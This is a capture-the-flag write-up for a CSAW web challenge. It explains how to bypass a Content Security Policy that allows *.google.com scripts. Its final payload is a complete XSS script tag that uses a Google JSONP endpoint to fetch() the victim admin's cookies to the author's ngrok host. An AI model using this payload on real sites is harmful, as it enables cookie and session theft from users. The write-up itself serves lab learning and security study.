Tags: csp-bypass csp
Rating: 5.0
Score: 50 <br> Vulnerability: Cross-Site Scripting (XSS) <br> Solution: Bypass Content Security Policy (CSP) <br> Link: http://web.chal.csaw.io:1000/ <br> Description:
I heard CSP is all the rage now. It's supposed to fix all the XSS, kill all of the confused deputies, and cure cancer?
The flag is in the cookies
Part 0x01 - Information Gathering <br> The author wants us to bypass the Content Security Policy (CSP) to get the flag in the cookies. With this kind of challenge, we need to perform Cross-Site Scripting (XSS) attack and grab the cookie in admin side. There are 2 functions on the website. First one is posting and second one is reporting to admin.
The CSP in the website has the following policy: default-src 'self'; script-src 'self' *.google.com; connect-src *
The script-src has a value of *.google.come which could allow us to bypass the CSP.
Part 0x02 - Vulnerability Exploitation <br> First thing we need to do is to execute an XSS. So, we have to look for a google endpoint that could help us bypass the CSP.
Well, luckily, PayloadsAllTheThings has a payload to bypass CSP using Google endpoint.
Using apfeifer27's CSP Bypass, we used Fetch to fetch the admin's cookie and pass it to our ngrok.
Final payload would be
<script/src="https://www.google.com/complete/search?client=chrome&jsonp=fetch(/http:\\affc7f76.ngrok.io/.toString().substr(1).concat(document.cookie));"></script>
Please note that I am playing with hackstreetboys team and this challenge was first solved by my teammate, Ameer.
Thanks for reading.
